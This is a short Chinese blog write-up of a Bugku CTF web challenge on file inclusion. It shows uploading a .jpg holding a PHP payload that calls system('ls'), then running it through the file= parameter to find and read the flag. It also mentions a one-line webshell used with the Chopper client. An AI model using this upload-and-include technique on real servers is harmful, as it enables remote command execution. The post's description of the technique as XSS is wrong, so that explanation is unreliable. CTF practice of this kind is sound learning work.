bugku-Web 文件包含2

版权声明:本文为博主原创文章,转载需注明出处。 https://blog.csdn.net/zz_Caleb/article/details/85016839

打开网页查看源代码,在最上面发现upload.php,于是我们就访问这个文件:http://123.206.31.85:49166/index.php?file=upload.php

发现是让我们上传文件,然而,我们上传了并没什么用,但是下面说出了文件的位置。

这里我们构造一个文件再上传(这里构造的文件再上传用到的应该是XSS的知识)

创建一个文本文件并输入:<script language=php>system("ls")</script>,然后将文件后缀改为jpg,保存上传。

(XSS的原理就是向网页源码中插入代码,system是调用系统命令,ls是查看当前文件夹的文件)

上传后我们访问文件所在位置:http://123.206.31.85:49166/index.php?file=upload/201812151107258968.jpg

看到一个txt文件,里面应该有flag,于是访问一下http://123.206.31.85:49166/index.php?file=this_is_th3_F14g_154f65sd4g35f4d6f43.txt

就拿到flag了。

注:也可用一句话+菜刀,不过可能上不去

猜你喜欢

转载自blog.csdn.net/zz_Caleb/article/details/85016839